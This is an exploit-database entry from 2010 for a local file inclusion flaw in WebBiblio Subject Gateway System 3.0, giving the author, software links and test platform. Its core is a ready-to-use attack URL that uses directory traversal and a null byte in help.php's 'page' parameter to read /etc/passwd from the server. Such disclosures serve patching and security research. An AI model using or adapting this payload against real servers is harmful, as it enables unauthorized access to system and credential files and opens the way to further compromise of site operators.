WebBiblio Subject Gateway System LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebBiblio Subject Gateway System LFI Vulnerability
# Published : 2010-06-06
# Author : AntiSecurity
# Previous Title : idevspot Text ads 2.08 sqli vulnerability
# Next Title : greeting card Remote Upload Vulnerability

# Exploit Title:
WebBiblio Subject Gateway System Local File Inclusion Vulnerability

# Date:
June 06 2010

# Author:
AntiSecurity

# Software Link:
http://webbiblio.sourceforge.net/
http://sourceforge.net/projects/webbiblio/files/

# Version:
WebBiblio version 3.0

# Tested on:
Linux

# Target:
http://server/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd%00